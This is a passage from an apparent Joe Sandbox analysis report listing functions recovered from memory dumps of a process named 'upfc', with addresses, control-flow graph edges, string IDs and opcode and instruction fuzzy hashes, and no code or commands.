                                                      • Instruction Fuzzy Hash: CA114C326085068FF705AE08D4552E57390EF543E1F50053FD409C76D1DEA5E9848BB0
                                                      Function 00007FF7C1B853FE Relevance: 2.6, Strings: 2, Instructions: 59COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 488 7ff7c1b853fe-7ff7c1b85402 489 7ff7c1b85408-7ff7c1b8540c 488->489 490 7ff7c1b855cf-7ff7c1b855df 488->490 493 7ff7c1b85416-7ff7c1b8541a 489->493 491 7ff7c1b855e6-7ff7c1b855ef 490->491 492 7ff7c1b855e1 490->492 492->491 494 7ff7c1b8541c 493->494 495 7ff7c1b85420-7ff7c1b85429 493->495 494->495 496 7ff7c1b85546-7ff7c1b85559 495->496 497 7ff7c1b8542f-7ff7c1b85443 495->497 498 7ff7c1b8555b 496->498 499 7ff7c1b85560-7ff7c1b85569 496->499 497->496 498->499
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2544752682.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1b80000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: )S6$)S6
                                                      • API String ID: 0-4226688195
                                                      • Opcode ID: e50abe4a96ec8906f1e6ee7cc4862c13a8cbed61ac6793d6f506b297e1c25b72
                                                      • Instruction ID: 25d063d4dc1b66778194e6578b2f24d140a7e11881d09be9ff83f9694dfa3674
                                                      • Opcode Fuzzy Hash: e50abe4a96ec8906f1e6ee7cc4862c13a8cbed61ac6793d6f506b297e1c25b72
                                                      • Instruction Fuzzy Hash: 73112532A0850A8FE705AE08D4122E57390EF583A5F90053FD40AC7AD2EEA5A8808BA0
                                                      Function 00007FF7C1B8616F Relevance: 1.7, Strings: 1, Instructions: 447COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 553 7ff7c1b8616f-7ff7c1b86182 554 7ff7c1b861ce-7ff7c1b861e4 553->554 555 7ff7c1b86184-7ff7c1b864c5 553->555 557 7ff7c1b861ea-7ff7c1b861f2 554->557 558 7ff7c1b86274-7ff7c1b862a4 554->558 561 7ff7c1b864cf 555->561 560 7ff7c1b861f8-7ff7c1b8620a 557->560 557->561 567 7ff7c1b8634e-7ff7c1b86357 558->567 568 7ff7c1b862aa-7ff7c1b862ab 558->568 560->561 562 7ff7c1b86210-7ff7c1b86227 560->562 564 7ff7c1b864d4-7ff7c1b86510 561->564 565 7ff7c1b86229-7ff7c1b86230 562->565 566 7ff7c1b86267-7ff7c1b8626e 562->566 571 7ff7c1b8651b-7ff7c1b865b1 564->571 565->561 569 7ff7c1b86236-7ff7c1b86264 565->569 566->557 566->558 572 7ff7c1b8635d-7ff7c1b86363 567->572 573 7ff7c1b8648f-7ff7c1b8649d 567->573 570 7ff7c1b862ae-7ff7c1b862c4 568->570 569->566 570->561 574 7ff7c1b862ca-7ff7c1b862ee 570->574 585 7ff7c1b865bc-7ff7c1b86aa8 call 7ff7c1bc7e38 571->585 586 7ff7c1b86536-7ff7c1b865b6 571->586 572->561 576 7ff7c1b86369-7ff7c1b86378 572->576 577 7ff7c1b864a4-7ff7c1b864b5 573->577 578 7ff7c1b8649f 573->578 582 7ff7c1b86341-7ff7c1b86348 574->582 583 7ff7c1b862f0-7ff7c1b86313 574->583 579 7ff7c1b8637e-7ff7c1b86385 576->579 580 7ff7c1b86482-7ff7c1b86489 576->580 578->577 579->561 584 7ff7c1b8638b-7ff7c1b86395 579->584 580->572 580->573 582->567 582->570 583->561 592 7ff7c1b86319-7ff7c1b8633f 583->592 589 7ff7c1b8639c-7ff7c1b863a7 584->589 586->585 596 7ff7c1b86558-7ff7c1b865b8 586->596 593 7ff7c1b863a9-7ff7c1b863c0 589->593 594 7ff7c1b863e6-7ff7c1b863f5 589->594 592->582 592->583 593->561 597 7ff7c1b863c6-7ff7c1b863e2 593->597 594->561 598 7ff7c1b863fb-7ff7c1b8641f 594->598 596->585 607 7ff7c1b8657c-7ff7c1b865ba 596->607 597->593 601 7ff7c1b863e4 597->601 602 7ff7c1b86422-7ff7c1b8643f 598->602 604 7ff7c1b86462-7ff7c1b86478 601->604 602->561 605 7ff7c1b86445-7ff7c1b86460 602->605 604->561 608 7ff7c1b8647a-7ff7c1b8647e 604->608 605->602 605->604 607->585 612 7ff7c1b8659d-7ff7c1b865b0 607->612 608->580
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2544752682.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1b80000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: )S6
                                                      • API String ID: 0-807267689
                                                      • Opcode ID: 13870747db82a837a1425f20602134f90bb472ba89c8779873f738885975d1dc
                                                      • Instruction ID: 5a682a6a2913874410209eebd349f47b0e2f8e10f256aec0636171ec7654a8b4
                                                      • Opcode Fuzzy Hash: 13870747db82a837a1425f20602134f90bb472ba89c8779873f738885975d1dc
                                                      • Instruction Fuzzy Hash: 63F1B2709186468FEB48DF18C4E46B4B7A1FF45310F9451BDC84E8B68ADB78E882CF91
                                                      Function 00007FF7C1B8115F Relevance: 1.7, Strings: 1, Instructions: 419COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 618 7ff7c1b8115f-7ff7c1b81172 619 7ff7c1b811be-7ff7c1b811d4 618->619 620 7ff7c1b81174-7ff7c1b814b5 618->620 622 7ff7c1b811da-7ff7c1b811e2 619->622 623 7ff7c1b81264-7ff7c1b81294 619->623 626 7ff7c1b814bf 620->626 625 7ff7c1b811e8-7ff7c1b811fa 622->625 622->626 633 7ff7c1b8133e-7ff7c1b81347 623->633 634 7ff7c1b8129a-7ff7c1b8129b 623->634 625->626 627 7ff7c1b81200-7ff7c1b81217 625->627 629 7ff7c1b814c4-7ff7c1b81500 626->629 630 7ff7c1b81219-7ff7c1b81220 627->630 631 7ff7c1b81257-7ff7c1b8125e 627->631 636 7ff7c1b8150b-7ff7c1b815a1 629->636 630->626 632 7ff7c1b81226-7ff7c1b81254 630->632 631->622 631->623 632->631 637 7ff7c1b8134d-7ff7c1b81353 633->637 638 7ff7c1b8147f-7ff7c1b8148d 633->638 635 7ff7c1b8129e-7ff7c1b812b4 634->635 635->626 642 7ff7c1b812ba-7ff7c1b812de 635->642 650 7ff7c1b815ac-7ff7c1b81a75 636->650 651 7ff7c1b81526-7ff7c1b815a6 636->651 637->626 639 7ff7c1b81359-7ff7c1b81368 637->639 640 7ff7c1b81494-7ff7c1b814a5 638->640 641 7ff7c1b8148f 638->641 644 7ff7c1b8136e-7ff7c1b81375 639->644 645 7ff7c1b81472-7ff7c1b81479 639->645 641->640 647 7ff7c1b81331-7ff7c1b81338 642->647 648 7ff7c1b812e0-7ff7c1b81303 642->648 644->626 649 7ff7c1b8137b-7ff7c1b81385 644->649 645->637 645->638 647->633 647->635 648->626 657 7ff7c1b81309-7ff7c1b8132f 648->657 654 7ff7c1b8138c-7ff7c1b81397 649->654 651->650 661 7ff7c1b81548-7ff7c1b815a8 651->661 658 7ff7c1b81399-7ff7c1b813b0 654->658 659 7ff7c1b813d6-7ff7c1b813e5 654->659 657->647 657->648 658->626 662 7ff7c1b813b6-7ff7c1b813d2 658->662 659->626 663 7ff7c1b813eb-7ff7c1b8140f 659->663 661->650 672 7ff7c1b8156c-7ff7c1b815aa 661->672 662->658 667 7ff7c1b813d4 662->667 668 7ff7c1b81412-7ff7c1b8142f 663->668 669 7ff7c1b81452-7ff7c1b81468 667->669 668->626 670 7ff7c1b81435-7ff7c1b81450 668->670 669->626 674 7ff7c1b8146a-7ff7c1b8146e 669->674 670->668 670->669 672->650 678 7ff7c1b8158d-7ff7c1b815a0 672->678 674->645
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2544752682.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1b80000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: )S6
                                                      • API String ID: 0-807267689
                                                      • Opcode ID: b7c8a2624616a298c4f8b92146fb75c5d6f4e4521a441ad44573c4ac07557c03
                                                      • Instruction ID: ef329df11ba843bbc74834ccb3886c177fdd4ad5d1b65176ab77c379454f4931
                                                      • Opcode Fuzzy Hash: b7c8a2624616a298c4f8b92146fb75c5d6f4e4521a441ad44573c4ac07557c03
                                                      • Instruction Fuzzy Hash: 67F1BF709195458FEB49DF18C4D06B4B7A1FF4A310B9456BDC84ECBA8ACA78F881CF90
                                                      Function 00007FF7C17D72E0 Relevance: 1.6, APIs: 1, Instructions: 120COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2538433781.00007FF7C17C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c17c1000_upfc.jbxd
                                                      Similarity
                                                      • API ID: ChangeCloseFindNotification
                                                      • String ID:
                                                      • API String ID: 2591292051-0
                                                      • Opcode ID: f101a1c4709ff254966f8261eb5df4cfdb854842bc3eab4445806296da5294f5
                                                      • Instruction ID: 48364a170a5a117d828ae1e5664a026f4b4adc848b18f9d0cff2c5b3dcadc7f1
                                                      • Opcode Fuzzy Hash: f101a1c4709ff254966f8261eb5df4cfdb854842bc3eab4445806296da5294f5
                                                      • Instruction Fuzzy Hash: 1231F37190CA898FD718EB6888097A9BBA0FF55320F1481AFD049C3193DA61A455CBD1
                                                      Function 00007FF7C1B8117F Relevance: 1.6, Strings: 1, Instructions: 334COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2544752682.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1b80000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: )S6
                                                      • API String ID: 0-807267689
                                                      • Opcode ID: 3e94fe719e1324c04e4ebaf3f19f77d7687963dcab3d67d84f3ffc44fcfe0483
                                                      • Instruction ID: 43e6cf6a4abecf40c56e4ec962e255d7d75511c7fefbd0bdb584bab79212704c
                                                      • Opcode Fuzzy Hash: 3e94fe719e1324c04e4ebaf3f19f77d7687963dcab3d67d84f3ffc44fcfe0483
                                                      • Instruction Fuzzy Hash: 9FC1AF705195468FEB09DF08D4E05B5B7A1FF46320B9456BDC89F8BA8BCA78E481CF50
                                                      Function 00007FF7C1B8618F Relevance: 1.6, Strings: 1, Instructions: 333COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2544752682.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1b80000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: )S6
                                                      • API String ID: 0-807267689
                                                      • Opcode ID: 3f75bc0b4b2c4a25fa34a7a994775a20f98a68207db0ccf7284da37a6b1e430b
                                                      • Instruction ID: b492aa31a28a1670c12d63b3b46182609df5e7f4ce57f47d457f49b3452d2f45
                                                      • Opcode Fuzzy Hash: 3f75bc0b4b2c4a25fa34a7a994775a20f98a68207db0ccf7284da37a6b1e430b
                                                      • Instruction Fuzzy Hash: D9C1AF305185468BEB0DDF18C4E05B5B7A1FF45720BA455BDC84A8BA8BDB78E882CB91
                                                      Function 00007FF7C1B9C02E Relevance: 1.5, Strings: 1, Instructions: 261COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2544752682.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1b80000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: )S6
                                                      • API String ID: 0-807267689
                                                      • Opcode ID: 197d82cd1ad61c553e7e8bfe5058ebb4502d5d451e9f196935862d9269f78dbe
                                                      • Instruction ID: 7cf8ba7ee199cfb73701fcc8e6e6b363a2da2d82db719ea9d2940470f6bf0f3f
                                                      • Opcode Fuzzy Hash: 197d82cd1ad61c553e7e8bfe5058ebb4502d5d451e9f196935862d9269f78dbe
                                                      • Instruction Fuzzy Hash: 79919230908A4D8FEBA8EF28D8557E977E1FF58350F50427AE84DC3296CF74A9458B81
                                                      Function 00007FF7C1B83099 Relevance: 1.5, Strings: 1, Instructions: 246COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2544752682.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1b80000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: )S6
                                                      • API String ID: 0-807267689
                                                      • Opcode ID: 2efd7cf0a8a2b0240cc5e35966d5b18001b75e9da1f16e2adb270df94f7361e9
                                                      • Instruction ID: 092a26bc05deac4a281460ee4543b37db1d34e56b94cdac9ce07c38bbe36ecfd
                                                      • Opcode Fuzzy Hash: 2efd7cf0a8a2b0240cc5e35966d5b18001b75e9da1f16e2adb270df94f7361e9
                                                      • Instruction Fuzzy Hash: B871583590C4494FF768FE1884165B4B7E0FF48B30B4492BDD49EC79B2DE58E80A8B91
                                                      Function 00007FF7C1B83C5B Relevance: 1.5, Strings: 1, Instructions: 228COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2544752682.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1b80000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: )S6
                                                      • API String ID: 0-807267689
                                                      • Opcode ID: f8f41e6be60d1eb1a35048b5e02a87734fc8d7ec04a9a7a7d949ba31ea4984ec
                                                      • Instruction ID: 8af465e03e70506d42bc93113906f5c85c2ff9615d0e5854dba8ebc73c503d7d
                                                      • Opcode Fuzzy Hash: f8f41e6be60d1eb1a35048b5e02a87734fc8d7ec04a9a7a7d949ba31ea4984ec
                                                      • Instruction Fuzzy Hash: 2471CE30D1864A9FEB98EF68C4546BCFBB1FF09750F90457EC00AD36A1DA68A841CF60
                                                      Function 00007FF7C1CA6752 Relevance: 1.4, Strings: 1, Instructions: 188COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2547403812.00007FF7C1CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1CA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1ca0000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: )S6
                                                      • API String ID: 0-807267689
                                                      • Opcode ID: f3c15014a2836a77d647b6b66a3618f645c5fc0b75041f2931808dd392ec19e0
                                                      • Instruction ID: a99a75f470410862fcf8d85b16634662caeeced8e8c530fb87fe9792b5222d28
                                                      • Opcode Fuzzy Hash: f3c15014a2836a77d647b6b66a3618f645c5fc0b75041f2931808dd392ec19e0
                                                      • Instruction Fuzzy Hash: AC51E930A18A498FD79AEF28C450AF5B3E1FF59360BA445B9E40DC7293DE69EC42C750
                                                      Function 00007FF7C1B85EF8 Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2544752682.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1b80000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID: 0-3916222277
                                                      • Opcode ID: f16449d93e25e3f2859ae81a2895fd7d0d0bf7112df9a244440a8a5153ae7a0f
                                                      • Instruction ID: 24fd10ee821fb34fb819137f18406abab751d48bbe22269a1d7e0627e90db6a4
                                                      • Opcode Fuzzy Hash: f16449d93e25e3f2859ae81a2895fd7d0d0bf7112df9a244440a8a5153ae7a0f
                                                      • Instruction Fuzzy Hash: 59514A70E0850ADFEB49EFA8C8546ADF7B1FF48314F5041BEC00AE7696CA746902CB50
                                                      Function 00007FF7C1B85A8F Relevance: 1.4, Strings: 1, Instructions: 154COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2544752682.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1b80000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: )S6
                                                      • API String ID: 0-807267689
                                                      • Opcode ID: 8b69e7df10e5124f09dac818830236ab255a4614eebf2bfe06ad0565ce74b5e7
                                                      • Instruction ID: ea1c2e1ef990e9ef9b05bd84f4211c44315933dcd6cbb97f8b2225f7206abd97
                                                      • Opcode Fuzzy Hash: 8b69e7df10e5124f09dac818830236ab255a4614eebf2bfe06ad0565ce74b5e7
                                                      • Instruction Fuzzy Hash: 89517D70A189069BE748EF18C1956A5F391FF58724F90927ED00EC7A86DB74F8918F90
                                                      Function 00007FF7C1B80EE8 Relevance: 1.4, Strings: 1, Instructions: 152COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2544752682.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1b80000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID: 0-3916222277
                                                      • Opcode ID: d0927d029655c53b73a9245d4602e55e1f72468f9f5ed436326d2dde42df81ed
                                                      • Instruction ID: a527f7bc052ffe92ed816ea179fa174a47abf70f1d2a2d0f7ea37fb343d3bdce
                                                      • Opcode Fuzzy Hash: d0927d029655c53b73a9245d4602e55e1f72468f9f5ed436326d2dde42df81ed
                                                      • Instruction Fuzzy Hash: EE515A70E0854E9FEB49EFA8C8945ADF7B1FF49310F5041BEC01AA7686CA74A905CB50
                                                      Function 00007FF7C1B84954 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2544752682.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1b80000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: )S6
                                                      • API String ID: 0-807267689
                                                      • Opcode ID: 60dd97ad8686ce1a3dbe6d679cabca6e0bae5f0a7ba61f88411823373fad637f
                                                      • Instruction ID: 8609f2ad5bc2b1e66ecd801e49ce8f10f85cb68928f083bbff99851b97eeefba
                                                      • Opcode Fuzzy Hash: 60dd97ad8686ce1a3dbe6d679cabca6e0bae5f0a7ba61f88411823373fad637f
                                                      • Instruction Fuzzy Hash: 6F312F31B0890A9FDB48EE5CD451AB8F7E1FF48720B90527AD01ED7686DF64B8528B90
                                                      Function 00007FF7C1B84A14 Relevance: 1.3, Strings: 1, Instructions: 88COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2544752682.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1b80000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: )S6
                                                      • API String ID: 0-807267689
                                                      • Opcode ID: 9d0b5d4b280602283466d9d098e1f98e0141059aef14a5b8c6e7239ce915344a
                                                      • Instruction ID: c946359f0f6cfb6f285fb45c8facd8cf6e7ed15ce4fc17fd20a1c1c83bcbbbc0
                                                      • Opcode Fuzzy Hash: 9d0b5d4b280602283466d9d098e1f98e0141059aef14a5b8c6e7239ce915344a
                                                      • Instruction Fuzzy Hash: 4321E631E0C64A8FE744FF6898563A8F7E0FF49321F54117ED05DCB683DAA868468B64
                                                      Function 00007FF7C1B853D8 Relevance: 1.3, Strings: 1, Instructions: 34COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2544752682.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1b80000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: )S6
                                                      • API String ID: 0-807267689
                                                      • Opcode ID: e3871cb22cfe1850511e7b13abc5b5c7f966493b2a624c31e340049a0978f4a2
                                                      • Instruction ID: f30d0ccd4ecf2c297255496e405753378ae5387e64245190a5d1b654313e9b2c
                                                      • Opcode Fuzzy Hash: e3871cb22cfe1850511e7b13abc5b5c7f966493b2a624c31e340049a0978f4a2
                                                      • Instruction Fuzzy Hash: D1F0BE21E0DA07DAF7253D109A522F9A640AF047A9FE0243ED40FC6CC2DDD929818BB1
                                                      Function 00007FF7C17A3AB9 Relevance: 1.3, Strings: 1, Instructions: 28COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2538433781.00007FF7C17A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c17a0000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: M
                                                      • API String ID: 0-3664761504
                                                      • Opcode ID: 65becff8f8e9be58a625f875ff51bd4750fccce2231dd10368239615a4e5ae4e
                                                      • Instruction ID: c099c56bdb97d17fa181c76db8be02a1c0bf63081522d5f67f50b157221d1cb9
                                                      • Opcode Fuzzy Hash: 65becff8f8e9be58a625f875ff51bd4750fccce2231dd10368239615a4e5ae4e
                                                      • Instruction Fuzzy Hash: DFF09B7054E7D04FC7069B358468545BFB0EF6720174A52DFC045CF5A3D62DD845C741
                                                      Function 00007FF7C17BDF49 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2538433781.00007FF7C17B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17B1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c17b1000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: M
                                                      • API String ID: 0-3664761504
                                                      • Opcode ID: 5d34a01df6acef6b16a198604abc5cafae7f8a208fb5f0160c44ef0b0a8842da
                                                      • Instruction ID: 263173563191b8f23142a62c5dfb806c5389707f0510f4ffa35ea8abc3ce31d4
                                                      • Opcode Fuzzy Hash: 5d34a01df6acef6b16a198604abc5cafae7f8a208fb5f0160c44ef0b0a8842da
                                                      • Instruction Fuzzy Hash: 46E06D71A0E7C04FCB16EA348868454BFA1EF6721174A41EEC48ACF1E3EA2D8885C711
                                                      Function 00007FF7C17B9169 Relevance: 1.3, Strings: 1, Instructions: 23COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2538433781.00007FF7C17B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17B1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c17b1000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I
                                                      • API String ID: 0-3707901625
                                                      • Opcode ID: 6ba3b73d6ff973fdfa05ee932f4d2208e6439473c895f13696eb3460a791a229
                                                      • Instruction ID: dc44915ff6a192f2a5e9be2d223d4abd9001f66310a0e4b1caeedc998ffd12c6
                                                      • Opcode Fuzzy Hash: 6ba3b73d6ff973fdfa05ee932f4d2208e6439473c895f13696eb3460a791a229
                                                      • Instruction Fuzzy Hash: 1DE01A7054E3C04FCB0AEB7488699457FA0AE6B21178A41DEC085CF5B3D22DD849C741
                                                      Function 00007FF7C1CA9E09 Relevance: 1.3, Strings: 1, Instructions: 23COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2547403812.00007FF7C1CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1CA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1ca0000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I
                                                      • API String ID: 0-3707901625
                                                      • Opcode ID: 5067bedb29617f27f9bea459e56518f1aee22d3688424d4383e391320e761884
                                                      • Instruction ID: b21f0059e6148a51376728b7b447ad110cba9f3630ae696b60e677c975868a41
                                                      • Opcode Fuzzy Hash: 5067bedb29617f27f9bea459e56518f1aee22d3688424d4383e391320e761884
                                                      • Instruction Fuzzy Hash: A2E01A7054E7C08FCB0AEB3588A99457FA0AE6721178A41DEC045CB5B3E229D849C741
                                                      Function 00007FF7C1CA6B59 Relevance: 1.3, Strings: 1, Instructions: 23COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2547403812.00007FF7C1CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1CA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1ca0000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I
                                                      • API String ID: 0-3707901625
                                                      • Opcode ID: 4e79edff96b7e8c58abf783e1b6ac974fa39b58003816401bbf90cc0ec878210
                                                      • Instruction ID: 13781698f81ac42b3a76740688a78a98266f06bed4f8d510c1bfbbccbb7599dc
                                                      • Opcode Fuzzy Hash: 4e79edff96b7e8c58abf783e1b6ac974fa39b58003816401bbf90cc0ec878210
                                                      • Instruction Fuzzy Hash: 2EE01A7054E7D04FCB0AEB7488699457FA0AE6721178A81DEC049CB5B3E229D849C741
                                                      Function 00007FF7C17B8FB9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2538433781.00007FF7C17B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17B1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c17b1000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I
                                                      • API String ID: 0-3707901625
                                                      • Opcode ID: 14821c0e34aa063c82afdf074ecdf176d6dd4a629408622ff3725e9bfd494b5c
                                                      • Instruction ID: 077aa2e3fa1154fb51cc68706d6a1198686a3a1f758485be5de67cd6e2f7fb0d
                                                      • Opcode Fuzzy Hash: 14821c0e34aa063c82afdf074ecdf176d6dd4a629408622ff3725e9bfd494b5c
                                                      • Instruction Fuzzy Hash: D9E09A6154E3C04FCB06AB7488699557FB0AE6B21178F45EEC186CF1B3E62D8849CB11
                                                      Function 00007FF7C1CA97E9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2547403812.00007FF7C1CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1CA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1ca0000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I
                                                      • API String ID: 0-3707901625
                                                      • Opcode ID: bcccd0ce03670a6ef113718328b71050bad4ec2faa1afda4c3b96790a4078d63
                                                      • Instruction ID: a925e472a931d06889f79351fffd65c2c3cf01231239158db509c3298ba8594c
                                                      • Opcode Fuzzy Hash: bcccd0ce03670a6ef113718328b71050bad4ec2faa1afda4c3b96790a4078d63
                                                      • Instruction Fuzzy Hash: DBE01A7154E7D04FCB16EB34886A8457FA0EE6721078A44EED186CF1F3E66D8849C711
                                                      Function 00007FF7C17A0A15 Relevance: 1.1, Instructions: 1084COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2538433781.00007FF7C17A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
